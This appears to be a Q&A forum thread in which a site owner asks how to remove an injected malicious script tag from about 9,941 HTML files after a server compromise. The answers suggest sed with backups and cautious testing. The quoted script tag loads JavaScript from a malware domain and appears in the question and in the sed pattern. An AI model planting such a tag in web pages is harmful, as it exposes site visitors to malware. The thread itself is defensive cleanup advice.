Search for a large piece of string with special characters in several files and replace

Question

My server was infected this week, and the attacker ran a script that injected a script in several files, and now my domain is blacklisted on Google.

The code injected was this:

<script language="JavaScript" src="http://sexfromindia.com/linkex/jquery-1.6.5.min.js" type="text/javascript"></script>

Careful! It's a malware!

So, I ran this command (It's a linux server):

grep -r "sexfromindia.com" /home/mydomain/public_html/

And this command returned 9941 files :/

I would like to run a script that will search for <script language="JavaScript" src="http://sexfromindia.com/linkex/jquery-1.6.5.min.js type="text/javascript"></script> and replace it for " " (double spaces). Since all the infected files are in .html, the double spaces will not harm anything.

Now, not all the files are infected, only 9941 (about 50%).

How should I clean this mess? Should I use awk, sed, grep, perl? Can anyone give me examples?

Thanks.

Answer 1

I would be tempted to take more drastic measures in case something more devious was also done.

That said, seems like sed is the way to go on this one. Here is an example of searching for text and replacing the entire line: Replace whole line containing a string using Sed.

You will probably want to test your script on a few files, and back everything up before you start making changes.

Answer 2

You can use a sed script and the command:

sed -i.bak -f script.sed file[s]

script.sed

s#<script language="JavaScript" src="http://sexfromindia.com/linkex/jquery-1.6.5.min.js" type="text/javascript"></script>#""#g

-i for in-place-editing with a backup.